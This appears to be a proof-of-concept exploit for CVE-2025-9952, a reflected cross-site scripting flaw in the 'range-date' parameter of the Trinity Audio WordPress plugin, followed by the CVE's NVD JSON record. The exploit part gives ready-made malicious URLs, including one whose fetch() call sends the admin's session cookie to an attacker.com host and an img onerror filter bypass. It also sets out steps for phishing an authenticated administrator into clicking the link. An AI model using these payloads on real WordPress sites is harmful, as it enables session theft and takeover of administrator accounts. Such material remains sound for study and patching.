CVE-2025-9952

<!-- CVE-2025-9952 - Trinity Audio Reflected XSS PoC --> <!-- The vulnerability exists in the 'range-date' parameter of post-management.php --> <!-- Attackers can inject arbitrary JavaScript through this unsanitized parameter --> <!-- Malicious URL example that triggers the XSS vulnerability --> <!-- Replace 'target-site.com' with the actual WordPress site using Trinity Audio plugin --> http://target-site.com/wp-admin/admin.php?page=trinity-audio&range-date=<script>alert('XSS-'+document.cookie)</script> <!-- More sophisticated payload for cookie stealing --> <!-- This payload exfiltrates the admin's session cookie to an attacker-controlled server --> http://target-site.com/wp-admin/admin.php?page=trinity-audio&range-date=<script>fetch('http://attacker.com/steal?c='+document.cookie)</script> <!-- Using HTML event handlers as alternative payload --> <!-- This bypasses basic script tag filters by using img onerror event --> http://target-site.com/wp-admin/admin.php?page=trinity-audio&range-date=<img src=x onerror=alert(document.domain)> <!-- Usage Notes: 1. The attacker needs to trick an authenticated WordPress admin into clicking the malicious link 2. Social engineering techniques (phishing emails, IM messages) are typically used 3. Once executed, the script runs in the victim's browser with their session privileges 4. Affected versions: All versions up to and including 5.20.2 --> <!-- Exploitation Flow: Step 1: Attacker crafts malicious URL with XSS payload in range-date parameter Step 2: Attacker distributes URL via phishing or social engineering Step 3: Victim (admin) clicks the link while authenticated to WordPress Step 4: Server reflects the unsanitized payload back in the HTML response Step 5: Browser executes the malicious JavaScript in admin's session context Step 6: Attacker steals cookies, hijacks session, or performs privileged actions -->

{"cve": {"id": "CVE-2025-9952", "sourceIdentifier": "[email protected]", "published": "2025-10-04T04:16:24.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Trinity Audio – Text to Speech AI audio player to convert content into audio plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'range-date' parameter in all versions up to, and including, 5.20.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/trinity-audio/tags/5.20.1/admin/inc/post-management.php#L37", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/trinity-audio/tags/5.20.1/admin/inc/post-management.php#L44", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3371934/trinity-audio/trunk/admin/inc/post-management.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a68ca792-6870-4e28-b118-ee1125842955?source=cve", "source": "[email protected]"}]}}